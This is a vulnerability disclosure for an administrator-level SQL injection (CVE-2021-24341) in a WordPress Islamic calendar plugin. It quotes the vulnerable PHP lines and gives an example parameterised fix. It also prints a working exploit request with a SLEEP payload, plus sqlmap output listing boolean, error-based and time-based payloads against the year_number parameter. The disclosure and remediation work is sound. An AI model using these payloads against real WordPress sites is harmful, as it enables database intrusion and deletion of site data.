Wp Plugin Xllentech English Islamic Calendar

Plugin Details

Plugin Name: wp-plugin : xllentech-english-islamic-calendar
Affected Version : 2.6.6 (and most probably lower versions, if any)
Vulnerability : SQL Injection
Minimum Level of Access Required : Administrator
CVE Number : CVE-2021-24341
Identified by : Syed Sheeraz Ali
WPScan Reference URL

Disclosure Timeline

Technical Details

Vulnerable File: /admin/partials/class-xllentech-english-islamic-calendar-troubleshooting.php

Vulnerable Code block and parameter:

  1. Administrator level SQLi for parameter year_number /admin/partials/class-xllentech-english-islamic-calendar-troubleshooting.php#84
84:	$year_number = $_POST["year_number"];
85:	$month_number = $_POST["month_number"];
86:	$wpdb->query("Delete from ".$month_firstdate_table." where english_month=".$month_number." and english_year=".$year_number);

Fix applied in 2.6.8: Track Changelog
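What a parameterised version of the handler looks like, as an added example written for this page. It is not the plugin's own code and not the actual 2.6.8 patch; it assumes a WordPress runtime (global $wpdb, current_user_can(), check_admin_referer()), and the function name, the nonce action name 'xc_troubleshooting_delete_date' and the table-name variable are assumptions for illustration. The POST field names and the nonce field name are the ones visible in the exploit request below.

```php
<?php
/**
 * Added example (not the plugin's code): the troubleshooting
 * "delete first-date row" handler rewritten with bound parameters.
 * Assumes WordPress is loaded; names marked below are assumptions.
 */

// Vulnerable pattern from the advisory (2.6.6), kept here for comparison:
//   $year_number  = $_POST["year_number"];
//   $month_number = $_POST["month_number"];
//   $wpdb->query("Delete from ".$month_firstdate_table." where english_month=".$month_number." and english_year=".$year_number);
// Both values land in the WHERE clause unquoted and unvalidated, so
//   year_number=2020 AND (SELECT 1381 FROM (SELECT(SLEEP(5)))nhTn)
// is executed by MySQL as part of the DELETE.

function xc_delete_firstdate_row( $month_firstdate_table ) { // name assumed
    global $wpdb;

    // Capability + nonce: stops CSRF and non-admins. These checks do not
    // stop an authenticated administrator from sending a crafted value,
    // so they complement the query fix below rather than replace it.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    check_admin_referer( 'xc_troubleshooting_delete_date',      // action name assumed
                         'xc-troubleshooting-delete-date-nonce' ); // field from the request

    if ( ! isset( $_POST['delete_firstdate'] ) || 'Y' !== $_POST['delete_firstdate'] ) {
        return false;
    }

    // Coerce to integers before anything else. absint() turns
    // "2020 AND (SELECT ... SLEEP(5) ...)" into 2020 and a non-numeric
    // string into 0, which the range check then rejects.
    $month_number = absint( $_POST['month_number'] ?? 0 );
    $year_number  = absint( $_POST['year_number'] ?? 0 );

    if ( $month_number < 1 || $month_number > 12 || $year_number < 1 ) {
        return false;
    }

    // The table name is plugin-controlled, never request-controlled.
    // prepare() cannot bind identifiers, so validate it strictly before
    // interpolating it.
    if ( ! preg_match( '/^[A-Za-z0-9_]+$/', $month_firstdate_table ) ) {
        return false;
    }

    // %d placeholders: wpdb::prepare() renders them as integers, so the
    // user-supplied values can no longer change the shape of the SQL.
    $sql = $wpdb->prepare(
        "DELETE FROM {$month_firstdate_table} WHERE english_month = %d AND english_year = %d",
        $month_number,
        $year_number
    );

    $deleted = $wpdb->query( $sql );
    return false !== $deleted;
}
```

With this handler the exploit body further down (year_number=2020 AND (SELECT 1381 FROM (SELECT(SLEEP(5)))nhTn)) is reduced to english_year = 2020 and returns immediately; sqlmap's boolean, error-based and time-based probes all collapse to the same integer comparison. The range check is an extra guard, not the fix: prepare() with %d alone already removes the injection.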

SQL Injection Type: Time-based blind SQL injection (sqlmap additionally confirmed boolean-based blind and error-based vectors on the same parameter, see the session output below)

PoC Screenshots:

  1. SQLmap PoC for year_number parameter (screenshot1)
  2. Request without injection payload (screenshot2)
  3. Request with 5 second sleep (screenshot3)
  4. Request with 15 second sleep (screenshot4)

Exploit

POST /wp-admin/options-general.php?page=xllentech_options_tab4 HTTP/1.1
Host: 172.28.128.50
Content-Length: 220
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Referer: http://172.28.128.50/wp-admin/options-general.php?page=xllentech_options_tab4
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1620299005%7Ci5JXmpPpeJQ1VG5oOoxo4SfbUVeO0BUOtOkrbprgxBE%7Cb8b96ad5dc1fd71f30f94e58a973b97fc46b1fb7ecb053030a983c1382bbf579; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3AiQVT6EvbuCedvp65Wb1%2BuUEl; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1620299005%7Ci5JXmpPpeJQ1VG5oOoxo4SfbUVeO0BUOtOkrbprgxBE%7Cbbdf7d49cc3121c461d8b37a6825e47e879dbd635c53362901c96c5a104fd46b; wp-settings-time-1=1620131631
Connection: close

month_number=12&year_number=2020 AND (SELECT 1381 FROM (SELECT(SLEEP(5)))nhTn)&delete_firstdate=Y&xc-troubleshooting-delete-date-nonce=fc60c35caf&_wp_http_referer=/wp-admin/options-general.php?page=xllentech_options_tab4
The response is returned after 5 seconds because the injected SLEEP(5) is executed by MySQL: the leading 2020 keeps the DELETE's WHERE clause valid and the appended AND (...) subquery is evaluated for it. Repeating the request with SLEEP(15) and observing a proportional delay (screenshot4) rules out network latency as the cause of the delay. Note that the request needs a valid administrator session cookie and the xc-troubleshooting-delete-date-nonce value taken from the settings page, and that it is a live DELETE on the plugin's table.

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: year_number (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: month_number=12&year_number=(SELECT (CASE WHEN (7200=7200) THEN 2020 ELSE (SELECT 6513 UNION SELECT 8978) END))&delete_firstdate=Y&xc-troubleshooting-delete-date-nonce=fc60c35caf&_wp_http_referer=/wp-admin/options-general.php?page=xllentech_options_tab4

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: month_number=12&year_number=2020 AND GTID_SUBSET(CONCAT(0x7162626271,(SELECT (ELT(7051=7051,1))),0x71767a6b71),7051)&delete_firstdate=Y&xc-troubleshooting-delete-date-nonce=fc60c35caf&_wp_http_referer=/wp-admin/options-general.php?page=xllentech_options_tab4

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: month_number=12&year_number=2020 AND (SELECT 1381 FROM (SELECT(SLEEP(5)))nhTn)&delete_firstdate=Y&xc-troubleshooting-delete-date-nonce=fc60c35caf&_wp_http_referer=/wp-admin/options-general.php?page=xllentech_options_tab4
---
[02:57:21] [INFO] testing MySQL
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[02:57:22] [WARNING] reflective value(s) found and filtering out
[02:57:22] [INFO] confirming MySQL
[02:57:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 8.0.0
[02:57:22] [INFO] fetching current user
[02:57:23] [INFO] retrieved: 'bob@localhost'
current user: 'bob@localhost'